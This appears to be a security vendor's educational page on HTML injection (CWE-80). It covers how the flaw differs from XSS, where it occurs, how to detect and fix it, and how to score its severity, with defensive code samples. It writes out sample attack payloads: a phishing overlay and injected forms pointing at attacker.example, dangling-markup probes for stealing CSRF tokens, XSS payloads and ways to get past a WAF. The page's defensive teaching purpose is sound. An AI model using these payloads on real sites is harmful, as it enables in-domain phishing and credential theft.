Vulnerability

HTML Injection
detect, understand, remediate

HTML injection (CWE-80) is any condition where an application reflects attacker-controlled markup into the rendered HTML of a page without first encoding it for the HTML context. The vulnerability sits next to XSS but is distinct from it: HTML injection covers the markup-injection root, and XSS adds JavaScript execution. When a WAF blocks script tags but lets iframes, anchors, or styles through, the result is in-domain phishing, brand defacement, dangling-markup data exfiltration, and the conditions for chaining into clickjacking or open-redirect attacks.

No credit card required. Free plan available forever.

Severity: Medium

CWE ID: CWE-80

OWASP Top 10: A03:2021 - Injection

CVSS 3.1 Score: 6.1

What is HTML injection?

HTML injection (CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page, sometimes referred to as Basic XSS) is any condition where an application reflects attacker-controlled markup into the rendered HTML of a page without first encoding it for the HTML context. The injected fragment becomes part of the document tree the browser parses. The attacker does not need JavaScript to execute. The damage comes from new structural elements appearing inside the page: a fake login form rendered above the real content, a misleading CSS-styled banner that overlays the navigation, a hyperlink that points away from the legitimate domain, an image that pulls a tracking pixel, or a malformed tag that swallows the rest of the document until the next matching quote or closing angle bracket.

The vulnerability sits inside OWASP A03:2021 Injection, next to but distinct from cross-site scripting (CWE-79), which adds JavaScript execution to the same root cause. The line between the two is filter-dependent. A page that filters <script> tags but accepts an <iframe> or an <a href> is still HTML injection; with a single bypass it becomes XSS. Many engagements report the finding as XSS because the script-execution payload lands first; the underlying class is HTML injection and the fix has to address the markup-injection problem at the root, not the specific JavaScript payload that exploited it.

Treat HTML injection as a standalone finding when the injection point allows new tags or attributes but the application's output context, encoding layer, or downstream Content Security Policy stops script execution. The leftover damage is real: phishing overlays inside the legitimate domain, brand defacement, link redirection, dangling-markup data exfiltration, and the conditions for chaining into clickjacking or open-redirect attacks. A finding that says "<script> is filtered, so this is informational" misses the threat model.

HTML injection vs XSS: where the line sits

The two findings are often confused, conflated, and reported under the wrong CWE. The table below names the practical distinctions a tester should walk through before deciding which class a finding belongs to.

| Property | HTML injection (CWE-80) | XSS (CWE-79) |
| --- | --- | --- |
| Required capability | New HTML tags, attributes, or markup structure render in the response without encoding. | Same root cause, plus a path to JavaScript execution: a <script> tag, an event-handler attribute, a javascript: URI, or an HTML sink that triggers a JavaScript context. |
| Typical payloads | <h1>, <iframe src>, <a href>, <img src>, <form action>, <link rel="stylesheet">, <style>, dangling <textarea>. | <script>alert(1)</script>, <img src=x onerror=alert(1)>, <a href="javascript:alert(1)">, <svg onload>. |
| Realistic impact | In-page phishing overlay, defacement, link redirection, dangling-markup exfiltration of CSRF tokens, conditional layout breakage that hides safety controls. | All of the HTML-injection impacts plus session theft, keylogging, account takeover, and arbitrary action execution as the victim. |
| Why the line gets blurred | A WAF or filter blocks <script> but lets <iframe> or onmouseover= through. The encoding gap is the same; only the payload class changes. | A successful XSS proof is also a proof of HTML injection. The reverse is not true. |
| Severity ceiling | Usually Medium when CSP and other downstream controls block script execution, with an inline social-engineering or phishing impact. | High to Critical depending on session scope, stored vs reflected, and whether MFA-bound actions can be triggered. |
| Fix surface | Context-aware HTML encoding at output, allowlist-based markup if rich content is required, plus a strict Content Security Policy as defence in depth. | Same fixes plus removing every script-injection sink (innerHTML, document.write, dangerouslySetInnerHTML, eval, javascript: URI handling). |

Where HTML injection shows up on real engagements

The injection sinks are the same as XSS: any place the application reflects user input into the response. The difference is what each sink is filtered for. The list below pairs the common sink with the realistic injected payload that lands when JavaScript execution is blocked.

| Sink | Realistic injected payload | Practical impact |
| --- | --- | --- |
| URL parameter reflected in body | An <h1> or styled <div> that renders a fake banner urging the user to enter credentials at a different URL. | In-domain phishing that bypasses URL-bar checks because the page really is on the legitimate origin. |
| Search results page header | <a href="https://attacker.example/sso">Click to verify your account</a> embedded above the result list. | Visitor redirection, tracking, and credential-collection campaigns that look indistinguishable from a real callout. |
| User profile or comment fields | <iframe src="https://attacker.example/spoof" width=600 height=400 style="border:0"> stored on a public profile page. | Persistent in-domain phishing for every viewer of the affected page; brand defacement at scale. |
| Email name or display field | <style>body{display:none}</style> or a malformed tag that swallows the page until the next matching quote or closing angle bracket appears further down the document. | Dangling-markup exfiltration of CSRF tokens, layout breakage that hides safety controls, denial of legitimate UX. |
| Error page that reflects the request | A <form action="https://attacker.example/login" method="post"> block injected before the legitimate page form. | Login-form override: the user submits credentials to the attacker because the injected form sits earlier in the DOM. |
| PDF, invoice, or report templates | Markup smuggled through a name field renders inside server-generated documents that quote the same string. | Trust-document defacement, in-document phishing for downstream readers, document-renderer SSRF in some cases. |
| Email templates that quote user input | An <a href> or a styled banner injected through a transactional email field that the email renderer accepts. | The phishing payload arrives from the legitimate sender domain, which most email defences trust by default. |
| Status pages and admin notices | An admin-only HTML field that renders without encoding, exploited through a privilege chain or a CSRF. | Legitimate-looking system message that targets every authenticated user (a maintenance window with a fake reset link). |

Why HTML injection really happens

The pattern is rarely a single missing call. It is a layered failure where a development team installs a script-blocker, declares the XSS class fixed, and never closes the markup-injection root. The next refactor adds a new sink, the filter does not match it, and the same input hits the document tree under a different tag.

Blocklist filters that target script tags only

A regex that strips <script> and javascript: leaves every other tag untouched. <iframe>, <a href>, <img src>, <form>, <style>, <link> all render unchanged. The fix is allowlist-based: encode every character that could close, open, or modify a tag, and only restore specific markup through a vetted sanitiser.
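The gap between a script-only blocklist and output encoding can be shown in a few lines. The sketch below is illustrative only: the regex is a hypothetical stand-in for the kind of filter described above, not any specific WAF rule, and the function names are made up for the example.

```python
import html
import re

# Hypothetical blocklist of the kind described above: it strips <script>
# elements and "javascript:" URIs, and nothing else.
SCRIPT_BLOCKLIST = re.compile(
    r"<\s*script\b.*?<\s*/\s*script\s*>|javascript:",
    re.IGNORECASE | re.DOTALL,
)


def blocklist_filter(value: str) -> str:
    """Remove only the patterns the blocklist knows about."""
    return SCRIPT_BLOCKLIST.sub("", value)


def encode_for_html_body(value: str) -> str:
    """Encode &, <, >, " and ' so the value renders as inert text."""
    return html.escape(value, quote=True)


payload = '<iframe src="https://attacker.example/spoof"></iframe>'

# The iframe contains nothing the blocklist matches, so it passes untouched.
print(blocklist_filter(payload))
# The encoder neutralises every markup character regardless of the tag name.
print(encode_for_html_body(payload))
```

The encoder does not need to know which tags are dangerous, which is why it keeps working when a new payload class appears.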

String concatenation into HTML output

Building HTML through "<div>" + userInput + "</div>" without a templating engine that auto-encodes is the most common single cause. The fix is to render through a context-aware template (React, Vue, Svelte, Jinja with autoescape) and to make it a code-review rule that no string concatenation produces HTML.

Encoding applied at the wrong context

JavaScript-string escaping a value that lands in HTML body context leaves angle brackets intact, and URL-encoding protects only until something decodes the value again before render. The encoding has to match the context the value renders into: HTML body, HTML attribute, JavaScript string, CSS value, or URL. A library that exposes only one "escape" function is a footgun.
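A short comparison makes the context mismatch concrete. This is a sketch using Python's standard library as a stand-in for whatever encoders the application actually uses; the sample value is hypothetical.

```python
import html
import json
from urllib.parse import quote, unquote

value = '"><iframe src=//attacker.example>'

# JavaScript-string escaping: quotes are escaped, angle brackets are not.
js_escaped = json.dumps(value)

# URL-encoding: percent sequences, which any later decode step restores.
url_encoded = quote(value, safe="")

# HTML encoding: the encoder that matches HTML body and quoted-attribute context.
html_encoded = html.escape(value, quote=True)

print(js_escaped)
print(url_encoded)
print(html_encoded)

# The raw markup survives JavaScript escaping and reappears after URL decoding.
assert "<iframe" in js_escaped
assert unquote(url_encoded) == value
assert "<" not in html_encoded and '"' not in html_encoded
```

Only the last form is safe to place in an HTML body or inside a quoted attribute value; the other two are correct for their own contexts and wrong for this one.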

Markdown or rich-text engines without an allowlist

Many Markdown renderers pass raw HTML through, either by default or once a single option is enabled. A Markdown field that accepts <iframe> or <form> is HTML injection by design. The fix is to disable raw-HTML pass-through and to allowlist a small set of markup tags inside the renderer.

Server-side template injection sinks

This is a second-order sink: user input is interpolated into a template at render time, after the point where the team believes it was made safe. The application encodes the value at the API tier and then re-renders it server-side without re-encoding it for the final context. The fix is to encode at the final HTML render boundary, not before.

Reliance on CSP without root-cause fix

A strict Content Security Policy is the right defence in depth, but it is not a substitute for output encoding. The HTML-injection class still allows phishing overlays, link redirection, and dangling-markup exfiltration even when CSP blocks every inline script. The fix is to encode at output and to keep CSP as a second wall.

A worked example: in-domain phishing through HTML injection

A common shape on engagements is a search results page that reflects the query into a header banner. The application is deployed behind a WAF that strips <script> tags, blocks javascript: URIs, and rejects requests that contain event-handler attributes. The team has run an automated scanner, seen no XSS hits, and signed off on the page. The pentester probes with a payload that uses no script and no event handlers.

# Vulnerable behaviour

GET /search?q=portal HTTP/1.1
Host: target.example

<!-- response body, abridged -->
<h1>Results for portal</h1>
<ul>...</ul>

# Pentester probe

GET /search?q=%3Cdiv+style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bbackground%3A%23fff%3Bz-index%3A9999%22%3EYour+session+expired.+Sign+in+at+%3Ca+href%3D%22https%3A%2F%2Fattacker.example%2Fsignin%22%3Etarget.example%2Fsignin%3C%2Fa%3E%3C%2Fdiv%3E HTTP/1.1
Host: target.example

# Decoded payload (rendered into the page)
<div style="position:fixed;top:0;left:0;width:100%;background:#fff;z-index:9999">
  Your session expired. Sign in at
  <a href="https://attacker.example/signin">target.example/signin</a>
</div>

# Result
The legitimate page renders normally. Above it sits a full-width white banner telling
the user that their session has expired, with a link that visually reads target.example
but resolves to attacker.example. Every visitor who follows the crafted URL sees the
overlay rendered inside the trusted origin, with a valid TLS certificate and the real
site chrome behind it. No script ever runs. A CSP that only restricts script sources
does not block any of this.

The pentester captures the request, the response, and a screenshot of the rendered overlay. The proof artefact is the in-domain screenshot, because that is what closes the question "is this informational or exploitable" for the client. The conversion path to harm is direct: the attacker emails or messages the crafted URL to a target user, the target sees the overlay inside the legitimate domain, and the captured credentials get reused on the real login form.

The fix is structural. The search header has to render through a context-aware encoder so the angle brackets become &lt; and &gt; in HTML body context. The Content Security Policy gets tightened to disallow inline styles, which removes the overlay vector even if a future regression breaks the encoder. A regression test asserts that the response for a payload containing markup characters renders the encoded form, not the raw form. On a SecPortal engagement, the proof artefacts (request, response, screenshot, payload, decoded payload, before-and-after screenshots after the fix lands) stay attached to the finding record through retest, so the close-out conversation references the patched encoder rather than a vague "it doesn't reproduce now" ticket.
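The encoder half of that fix can be sketched as follows. `render_search_header` is a hypothetical stand-in for the application's template, and the probe URL is a shortened form of the one in the worked example, not the full payload.

```python
import html
from urllib.parse import parse_qs, urlsplit


def render_search_header(query: str) -> str:
    """Hypothetical fixed renderer: encode at the HTML body boundary."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


# Shortened version of the pentester probe from the worked example.
probe_url = (
    "/search?q=%3Cdiv+style%3D%22position%3Afixed%22%3E"
    "Sign+in+at+%3Ca+href%3D%22https%3A%2F%2Fattacker.example%2Fsignin%22%3E"
    "target.example%2Fsignin%3C%2Fa%3E%3C%2Fdiv%3E"
)

# parse_qs percent-decodes the value and turns "+" into spaces,
# mirroring what a typical web framework hands to the handler.
query = parse_qs(urlsplit(probe_url).query)["q"][0]
header = render_search_header(query)

print(query)   # the decoded markup the attacker wants rendered
print(header)  # the same markup, now inert text inside the <h1>
```

After the fix, the only angle brackets left in the header belong to the template's own `<h1>` element, so the overlay is displayed as literal text instead of being parsed.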

How to detect HTML injection

Automated detection

  • SecPortal's authenticated scanner probes every reflected and stored input field with a graduated payload set: angle brackets, an attribute-context probe, a tag-context probe, an iframe probe, a form probe, and a dangling-markup probe. Findings are reported when the response body renders the unescaped probe characters in any HTML-affecting context.
  • The same scanner classifies hits by the highest-impact payload that landed: dangling markup at the top, then iframe and form, then anchor and image, then style and inline-CSS. The classification drives the CVSS calibration so the severity matches the realistic impact rather than the mere presence of an angle bracket in the response.
  • The external scanner flags the unauthenticated cases (search pages, error pages, tracking-parameter reflections, public profile pages) without needing credentials. Authentication-gated sinks need the authenticated module.
  • Findings ship with the captured request, the unescaped response substring, the highest-impact payload class, and a reproducer command. The reproducer is what engineering needs to verify the fix at retest; the screenshot is what the business stakeholder needs to understand the impact.
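The ranking idea in the list above can be pictured with a small lookup. This is a sketch of the ordering as described, not SecPortal's implementation; the class names and the function are hypothetical.

```python
from typing import Iterable, Optional

# Highest impact first, following the order given in the list above.
PAYLOAD_CLASS_RANK = [
    "dangling-markup",
    "iframe",
    "form",
    "anchor",
    "image",
    "style",
]


def highest_impact(landed: Iterable[str]) -> Optional[str]:
    """Return the highest-ranked payload class among those that landed."""
    landed_set = set(landed)
    for payload_class in PAYLOAD_CLASS_RANK:
        if payload_class in landed_set:
            return payload_class
    return None  # nothing landed, or only unknown classes


print(highest_impact(["style", "anchor", "form"]))
```

Reporting the top-ranked class keeps the severity tied to the worst proven outcome instead of the first probe that happened to reflect.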

Manual testing

  • Inventory every input that reaches the rendered HTML: query parameters, POST body fields, cookie values that appear on a debug page, JSON fields rendered server-side, headers reflected by error handlers, and document fields rendered into PDF or email templates.
  • Probe each input with a graduated payload sequence. Start with literal angle brackets, then a benign new tag like <b>, then an attribute-context probe like " autofocus, then a structural tag like <iframe src="//example.test">, then a dangling-markup probe like <img src=". Each step that lands without encoding is a finding.
  • Verify the rendered output, not just the response body. A response that contains <iframe> encoded as text in a JSON field but rendered as raw HTML in a downstream view is still HTML injection at the rendered tier. Browser dev tools, view-source, and a copy of the rendered DOM are the truth source.
  • Test the bypass paths around the WAF. A payload that uses Unicode lookalikes, extra whitespace, mixed case in tag names, or a leading null byte often slips a regex-based filter. The fix is encoding, not blocking; a tester should still demonstrate the bypass to make the case for fixing the root cause.
  • Test the second-order sinks. A name field that is encoded at the API tier may be re-rendered into a server-generated PDF, an email template, or a client-portal admin view that re-evaluates the markup. A second-order injection often has higher business impact than the first-order reflection.
  • Test the dangling-markup vectors. A trailing <img src=" that swallows the rest of the document until a closing quote appears can exfiltrate CSRF tokens or session metadata to an attacker-controlled URL through the image fetch. CSP without strict img-src is not a defence.
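The graduated probe sequence from the steps above can be expressed as a small triage helper. This is a sketch under stated assumptions: `render` is a hypothetical callable standing in for "send the input, return the response body", and a substring match is only a first pass, since the rendered DOM remains the truth source.

```python
import html
from typing import Callable, List

# Graduated probes from the manual-testing steps, mildest first.
PROBES = [
    ("angle-brackets", "<>"),
    ("benign-tag", "<b>probe</b>"),
    ("attribute-break", '" autofocus'),
    ("structural-tag", '<iframe src="//example.test">'),
    ("dangling-markup", '<img src="'),
]


def landed_probes(render: Callable[[str], str]) -> List[str]:
    """Return the names of probes that come back unencoded from render()."""
    return [name for name, probe in PROBES if probe in render(probe)]


def vulnerable(q: str) -> str:
    # Hypothetical handler that concatenates input into the page.
    return f"<h1>Results for {q}</h1>"


def fixed(q: str) -> str:
    # Hypothetical handler that encodes at the HTML boundary.
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


print(landed_probes(vulnerable))
print(landed_probes(fixed))
```

Each name the helper returns is a candidate to confirm in the browser, not a finished finding. A raw double quote in body context, for example, is harmless there and only matters where the value lands inside an attribute.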

How to fix HTML injection

Encode at output, in the right context

Use a context-aware HTML encoder for HTML body context (replace &, <, >, ", and ' with their named or numeric entities), an attribute-context encoder for HTML attribute context, and a JavaScript-string encoder for inline JavaScript. The library should be one with separate functions per context, not a single "escape" call. Modern templating engines (React JSX, Vue, Svelte, Jinja with autoescape, Razor) handle the body context correctly by default; verify the attribute context separately for any field that renders into one.

Render rich content through an allowlist sanitiser

When the field has to accept formatting (a comment with bold text, a description with bullet lists), use an allowlist-based sanitiser like DOMPurify in the browser or sanitize-html on the server. Allowlist a small set of tags and attributes; never use a denylist. The sanitiser configuration is a security boundary and belongs in code review.
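To show what "allowlist" means mechanically, here is a minimal sketch built on Python's standard `html.parser`. It is an illustration of the principle only and not a replacement for a vetted sanitiser such as the ones named above; the tag list and class name are assumptions made for the example.

```python
import html
from html.parser import HTMLParser

# Assumed allowlist for the example: simple formatting tags, no attributes.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "ul", "ol", "li"}


class AllowlistSanitiser(HTMLParser):
    """Re-emit allowlisted tags without attributes and escape all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # every attribute is dropped

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-encoded, so stray markup characters stay inert.
        self.out.append(html.escape(data, quote=True))


def sanitise(fragment: str) -> str:
    parser = AllowlistSanitiser()
    parser.feed(fragment)
    parser.close()  # flush any buffered trailing text
    return "".join(parser.out)


print(sanitise('<b>hi</b><iframe src="//x"></iframe><a href="javascript:1">x</a>'))
```

Anything not on the list is dropped by default, which is the property a denylist cannot offer: a tag the author never thought of is rejected without a rule being written for it.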

Disable raw HTML pass-through in Markdown engines

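Raw-HTML handling varies by renderer and configuration. marked passes raw HTML through by default, markdown-it does so when html: true is set, and a remark/rehype pipeline does so when allowDangerousHtml is enabled. Keep markdown-it at html: false, run marked output through an allowlist sanitiser such as DOMPurify, and add rehype-sanitize to remark pipelines. Then add a regression test that asserts a Markdown payload containing <iframe> renders as escaped text.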

Enforce a strict Content Security Policy as defence in depth

A CSP that disallows inline scripts, inline styles, and unsafe-eval limits the damage from a future regression. It does not replace output encoding. The CSP should also restrict img-src and connect-src to prevent dangling-markup exfiltration through pixel tracking. Read the implementation guide on the missing security headers page for the specific directives.
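As a rough illustration of such a policy, the sketch below assembles a header value from a directive map. The directive names are standard CSP directives, but the specific source lists are assumptions for the example, and `form-action`, `frame-src`, and `base-uri` are additions not named in the text above.

```python
# Illustrative policy only; real source lists depend on the application.
CSP_DIRECTIVES = {
    "default-src": ["'self'"],
    "script-src": ["'self'"],   # no 'unsafe-inline', no 'unsafe-eval'
    "style-src": ["'self'"],    # no 'unsafe-inline', so style="" overlays are blocked
    "img-src": ["'self'"],      # limits image-fetch exfiltration targets
    "connect-src": ["'self'"],
    "form-action": ["'self'"],  # assumption: limits where injected forms can post
    "frame-src": ["'none'"],    # assumption: blocks injected iframes
    "base-uri": ["'none'"],     # assumption: blocks injected <base> tags
}


def build_csp(directives: dict) -> str:
    """Join directives into a Content-Security-Policy header value."""
    return "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )


header_value = build_csp(CSP_DIRECTIVES)
print("Content-Security-Policy:", header_value)
```

A policy like this narrows what injected markup can do, but the markup still lands in the document, which is why it stays a second wall behind output encoding.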

Encode user input that reaches PDF, email, and document templates

The same fix has to land at every render tier. A name field encoded in the web view but interpolated raw into a PDF template is still vulnerable. Document renderers, email templates, invoice generators, and report exporters all need their own encoding boundaries.

Treat the WAF as a backstop, not a fix

WAF rules that strip script tags create a false sense of safety. The HTML-injection class is wider than the script-execution class. Fix the encoding, then keep the WAF for the unknown-unknown class of payloads. A finding should reference the WAF rule and the encoding fix together.

Add a regression test on the encoding boundary

A small test that asserts a payload with angle brackets and quotes renders as the encoded equivalent prevents the bug from regressing during a refactor. The test belongs near the template, not in a unit test of the validation layer; the bug lives at output, so the test should live there.
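A regression test of this kind might look like the following pytest-style sketch. `render_search_header` is a hypothetical stand-in for the real template call, and the payload list is an assumption drawn from the probes discussed earlier on this page.

```python
import html

PREFIX = "<h1>Results for "
SUFFIX = "</h1>"


def render_search_header(query: str) -> str:
    """Hypothetical template under test; replace with the real render call."""
    return f"{PREFIX}{html.escape(query, quote=True)}{SUFFIX}"


MARKUP_PAYLOADS = [
    "<b>x</b>",
    '" autofocus',
    "<img src='",
    '<iframe src="//example.test">',
]


def test_header_encodes_markup():
    for payload in MARKUP_PAYLOADS:
        rendered = render_search_header(payload)
        inner = rendered[len(PREFIX):-len(SUFFIX)]
        # No raw markup characters may survive inside the template slot.
        for char in "<>\"'":
            assert char not in inner, (payload, char)
        # The encoded form must still decode back to what the user typed.
        assert html.unescape(inner) == payload
```

The second assertion guards against the opposite regression, where a fix "works" by silently deleting characters instead of encoding them.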

Audit the second-order sinks together with the primary input

Every place the same field is rendered should be in the change set. An identifier that is encoded on the public web view but interpolated raw into the admin console, a search index, an export job, or a downstream service has not been fixed.

Severity calibration

HTML injection findings get disputed in two predictable ways. Engineering pushes back that the finding is "informational because the script blocker stopped XSS", which conflates the script-execution class with the markup-injection class. The CISO pushes back that the report should not flag a marketing page that reflects the URL into a heading, which over-corrects against legitimate findings on form-rendering pages. Both miss the calibration point. CVSS 3.1 for a confirmed HTML-injection finding with a reproducible in-domain phishing path typically lands at AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 base, Medium), and the score moves up when the sink is stored, when the affected page is authenticated, or when dangling markup can exfiltrate CSRF tokens.
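The 6.1 figure can be reproduced from the vector with the CVSS 3.1 base-score equations. The sketch below covers base metrics only (no temporal or environmental scoring); the function names are illustrative.

```python
import math

AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
# Privileges Required weights depend on whether Scope is Unchanged or Changed.
PR = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """CVSS 3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["S"]][m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"))  # 6.1
```

For this vector the impact sub-score is about 2.73 and exploitability about 2.84. With Scope Changed, their sum is multiplied by 1.08 to give roughly 6.007, which rounds up to 6.1.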

The strongest reports name the payload class that landed (anchor, iframe, form, style, dangling markup), the affected sink, the rendered evidence (a screenshot of the in-domain overlay or the modified DOM), the realistic downstream impact for the specific application (in-domain phishing of session-bound users, defacement on a public profile, link redirection of a high-traffic search page), and the CVSS vector calibrated to the proven path. The severity calibration research covers the case-by-case decision-making that separates a real Medium from an inflated High and from a dismissed Low.

Reporting an HTML injection finding

On a SecPortal engagement, the finding sits on the engagement record with the affected sink, the rendered payload class, the captured request and response, the screenshot of the rendered output, the CVSS 3.1 vector calibrated to the realistic downstream chain, the CWE-80 mapping (with CWE-79 cross-reference if a script-execution path was demonstrated alongside it), and the remediation guidance from this page. The proof artefacts stay attached through retest, so the close-out conversation references the patched encoding boundary rather than a generic "can't reproduce now" note.

The finding triage workflow covers how to separate scanner-derived flags (an angle-bracket reflection in a JSON field) from manually validated findings (a captured screenshot of an in-domain overlay), so the report differentiates rule hits from confirmed exploits. The pentest report writing guide covers how to phrase the business impact for a reader who needs to understand why an HTML-injection finding matters when no script ran. And the retesting workflow covers the verification steps for a fix that has to land at multiple render tiers.

A pentester checklist for HTML injection

The list below is the minimum coverage a tester should walk through before declaring a target's rendered HTML free of injection. Each item maps to a specific sink class and a specific payload context.

  • Reflected query parameters: probe with angle brackets, with a benign new tag, with an attribute-context probe, and with a structural tag (iframe, form, anchor). Verify the rendered DOM for each, not just the response body.
  • Stored fields: profile names, comment fields, document titles, file names, project descriptions, support ticket subjects. Inject through one user account and view through another to confirm persistence.
  • Markdown and rich-text editors: probe whether raw HTML pass-through is enabled. Assert that <iframe> and <form> render as escaped text, not as new elements.
  • Header reflection: error pages that quote the user-agent, the host header, or the X-Forwarded-For value. The same input that injects on a marketing page often injects on the error page.
  • Second-order sinks: PDF templates, email renderers, invoice generators, report exporters, admin console views. The same name or description field can render encoded in one tier and raw in another.
  • Dangling markup: probe with a trailing <img src=" or a trailing <style> that swallows downstream content. Confirm whether CSRF tokens, session metadata, or user PII appears in the eventual fetched URL or rendered exfiltration channel.
  • Bypass paths around the WAF: Unicode lookalikes, extra whitespace, mixed case, leading null bytes, fragmented requests. A payload that lands through a bypass is still a vulnerability; demonstrate it to make the encoding-fix case stronger.
  • Record the payload class that landed (anchor, iframe, form, style, dangling markup), the affected sink, the rendered evidence (screenshot of the in-domain overlay or modified DOM), the CVSS vector calibrated to the realistic downstream chain, the CWE-80 mapping (and CWE-79 cross-reference where a script-execution path was demonstrated), and the remediation plan covering output encoding, sanitiser allowlist, CSP tightening, and a regression test.

Catch markup-injection sinks before the phishing overlay lands

SecPortal's authenticated scanner probes reflected and stored sinks with a graduated payload set, classifies hits by the highest-impact payload that landed, and ships findings with captured screenshots and reproducer commands. Start free.
